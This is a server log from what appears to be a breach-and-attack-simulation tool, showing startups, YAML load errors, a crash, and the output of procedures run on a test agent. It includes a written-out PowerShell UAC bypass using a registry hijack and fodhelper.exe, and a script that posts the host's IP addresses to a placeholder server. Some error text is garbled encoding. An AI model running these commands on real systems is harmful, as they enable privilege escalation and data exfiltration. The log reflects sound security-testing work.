nohup.out
125 lines (108 loc) · 10.1 KB
    _______ __
   / ____(_) /_  ___  _____
  / /_  / / __ \/ _ \/ ___/
 / __/ / / /_/ /  __/ /
/_/   /_/_.___/\___/_/          v3.0.0-beta.3
--------------------------------------------------
INFO Server started on: http://127.0.0.1:8002 (bound on host 0.0.0.0 and port 8002)
INFO Total handlers count: 19
INFO Prefork: Disabled
INFO PID: 224619
INFO Total process count: 1
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
TCP server listening on port 8080
[GIN-debug] GET /swagger/*any --> github.com/swaggo/gin-swagger.CustomWrapHandler.func1 (3 handlers)
[GIN-debug] [WARNING] You trusted all proxies, this is NOT safe. We recommend you to set a value.
Please check https://pkg.go.dev/github.com/gin-gonic/gin#readme-don-t-trust-all-proxies for details.
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8001
[GIN] 2024/10/19 - 16:07:54 | 200 | 220.781µs | 223.195.37.233 | GET "/swagger/index.html"
[GIN] 2024/10/19 - 16:07:54 | 200 | 8.908871ms | 223.195.37.233 | GET "/swagger/swagger-ui.css"
[GIN] 2024/10/19 - 16:07:54 | 200 | 24.499633ms | 223.195.37.233 | GET "/swagger/swagger-ui-standalone-preset.js"
[GIN] 2024/10/19 - 16:07:54 | 200 | 61.165701ms | 223.195.37.233 | GET "/swagger/swagger-ui-bundle.js"
[GIN] 2024/10/19 - 16:07:54 | 200 | 77.784µs | 223.195.37.233 | GET "/swagger/favicon-32x32.png"
[GIN] 2024/10/19 - 16:07:54 | 200 | 214.097µs | 223.195.37.233 | GET "/swagger/doc.json"
[GIN] 2024/10/19 - 16:07:54 | 304 | 20.359µs | 223.195.37.233 | GET "/swagger/favicon-32x32.png"
======= tcp received ===========
Invalid Command
Error reading from connection: EOF
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Collection_0006.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0004.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0005.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_DefenseEvasion_0009.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0014.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0018.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0019.yaml: failed to unmarshal yaml: yaml: line 5: did not find expected key
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0022.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Persistence_0011.yaml: failed to unmarshal yaml: yaml: line 9: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Persistence_0012.yaml: failed to unmarshal yaml: yaml: line 3: found character that cannot start any token
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Persistence_0013.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
&{ObjectID("000000000000000000000000") 4b1abe9d2ab645e4a93672722915d65d P_PrivilegeEscalation_0001 beba052411994cc3acb54a10209deb9b 2024-10-19 16:21:13.7738921 +0900 KST 1
Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open
Name Property
---- --------
command
New-Item -Path 'HKCU:\Software\Classes\ms-settings\shell\open\command' -Force; Set-ItemProperty -Path 'HKCU:\Software\Classes\ms-settings\shell\open\command' -Name '(default)' -Value 'cmd.exe /c start "C:\Users\user\Desktop\agent.exe"'; Set-ItemProperty -Path 'HKCU:\Software\Classes\ms-settings\shell\open\command' -Name 'DelegateExecute' -Value ''; Start-Process "fodhelper.exe"}
Inserted document with ID: ObjectID("67135de9cd35e156c0a3300b")
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Collection_0006.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0004.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0005.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_DefenseEvasion_0009.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0014.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0018.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0019.yaml: failed to unmarshal yaml: yaml: line 5: did not find expected key
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0022.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Persistence_0011.yaml: failed to unmarshal yaml: yaml: line 9: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Persistence_0012.yaml: failed to unmarshal yaml: yaml: line 3: found character that cannot start any token
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Persistence_0013.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
&{ObjectID("000000000000000000000000") 4b1abe9d2ab645e4a93672722915d65d P_Discovery_0001 6057a0c905d34f9d84518398b85ee8db 2024-10-19 16:21:37.3475748 +0900 KST -1 command execution failed: Invoke-WebRequest : Internet Explorer ������ ������ �� ���ų� Internet Explorer�� ���� ���� ������ �������� �ʾ�
���� �������� ���� �м��� �� �����ϴ�. UseBasicParsing �Ű� ������ �����ϰ� �ٽ� �õ��Ͻʽÿ�.
��ġ ��:1 ����:273
+ ... ess; $PublicIP = (Invoke-WebRequest -Uri "http://ifconfig.me").Conten ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestC
ommand
Invoke-RestMethod : ���� �̸��� Ȯ���� �� �����ϴ�.: 'server'
��ġ ��:1 ����:393
+ ... PublicIP }; Invoke-RestMethod -Uri "@server" -Method Post -Body ($Dat ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-RestMethod], WebException
+ FullyQualifiedErrorId : System.Net.WebException,Microsoft.PowerShell.Commands.InvokeRestMethodCommand
, error: exit status 1 $PrivateIP = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.IPAddress -like '10.*' -or $_.IPAddress -like '172.1[6-9].*' -or $_.IPAddress -like '172.2[0-9].*' -or $_.IPAddress -like '172.3[0-1].*' -or $_.IPAddress -like '192.168.*.*' }).IPAddress; $PublicIP = (Invoke-WebRequest -Uri "http://ifconfig.me").Content.Trim(); $Data = @{ PrivateIP = $PrivateIP; PublicIP = $PublicIP }; Invoke-RestMethod -Uri "@server" -Method Post -Body ($Data | ConvertTo-Json) -ContentType "application/json" | Out-Null}
Inserted document with ID: ObjectID("67135e01cd35e156c0a33018")
======= tcp received ===========
panic: runtime error: makeslice: len out of range
goroutine 7476 [running]:
github.com/HTTPs-omma/HTTPsBAS-HSProtocol/HSProtocol.(*HSProtocolManager).Parsing(0x220ee90?, {0xc001780000, 0x435a8d?, 0xc000f2d340?})
/home/ubuntu/go/pkg/mod/github.com/!h!t!t!ps-omma/!h!t!t!ps!b!a!s-!h!s!protocol@v1.4.2/HSProtocol/HSProtocol.go:129 +0x85
main.handleTCPConnection({0x124fef8, 0xc000baee90})
/home/ubuntu/agentApp/HTTPsBAS-ManagingServer/main.go:110 +0x20f
created by main.TCPServer in goroutine 5
/home/ubuntu/agentApp/HTTPsBAS-ManagingServer/main.go:88 +0x25f
exit status 2
TCP server listening on port 8080
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
    _______ __
   / ____(_) /_  ___  _____
  / /_  / / __ \/ _ \/ ___/
 / __/ / / /_/ /  __/ /
/_/   /_/_.___/\___/_/          v3.0.0-beta.3
--------------------------------------------------
INFO Server started on: http://127.0.0.1:8002 (bound on host 0.0.0.0 and port 8002)
INFO Total handlers count: 19
INFO Prefork: Disabled
INFO PID: 3157198
INFO Total process count: 1
[GIN-debug] GET /swagger/*any --> github.com/swaggo/gin-swagger.CustomWrapHandler.func1 (3 handlers)
[GIN-debug] [WARNING] You trusted all proxies, this is NOT safe. We recommend you to set a value.
Please check https://pkg.go.dev/github.com/gin-gonic/gin#readme-don-t-trust-all-proxies for details.
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8001
signal: interrupt
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
Error starting HTTP server: failed to listen: failed to listen: listen tcp4 :8002: bind: address already in use